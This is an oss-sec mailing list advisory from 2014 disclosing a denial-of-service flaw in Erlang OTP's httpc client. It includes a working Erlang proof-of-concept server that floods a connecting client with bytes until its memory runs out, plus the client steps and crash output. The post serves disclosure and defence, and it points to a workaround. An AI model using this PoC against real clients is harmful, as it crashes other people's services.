oss-sec mailing list archives
Erlang OTP's httpc module Denial of Service
From: Seba <argos83 () gmail com>
Date: Fri, 2 May 2014 13:13:12 +0200
Hi, I've reported this issue to erlang-bugs mailing list: http://erlang.org/pipermail/erlang-bugs/2014-May/004369.html Regards, Sebastián Tello. Using httpc to connect to a malicious server can cause the system to run out of memory and crash. Description =========== When requesting a URL from an untrusted source using the httpc OTP module, if the server: - accepts the connection - does not read from the socket - and indefinitely writes bytes in the socket. Then the client will keep on allocating memory until the system crashes. Proof of concept ================ Server-side (attacker): ==== PoC module: httpc_dos.erl ==== -module(httpc_dos). -export([server/1, server/0]). server() -> server(5678). server(Port)-> {ok, LSock} = gen_tcp:listen(Port, [binary, {packet, 0}, {active, false}]), {ok, Sock} = gen_tcp:accept(LSock), socket_write(Sock). socket_write(Sock) -> ok = gen_tcp:send(Sock, lists:flatten(lists:duplicate(4096, "A"))), socket_write(Sock). ======== EOF ===== Start the server (use the above module). 1> httpc_dos:server(5678). Client-side (httpc), connect to the server: $ erl Erlang/OTP 17 [erts-6.0] [source] [64-bit] [smp:4:4] [async-threads:10] [hipe] [kernel-poll:false] Eshell V6.0 (abort with ^G) 1> application:start(inets). ok 2> httpc:request("http://SERVER_IP:5678"). Crash dump was written to: erl_crash.dump eheap_alloc: Cannot allocate 1167696400 bytes of memory (of type "heap"). Tested on ========= OTP 17 Ubuntu 12.04 x86_64 Workaround ========== Use lhttpc (https://github.com/esl/lhttpc).I haven't been able to reproduce the issue using lhttpc as the call will crash when the response size is too large.
Current thread:
- Erlang OTP's httpc module Denial of Service Seba (May 02)
- Re: Erlang OTP's httpc module Denial of Service cve-assign (May 04)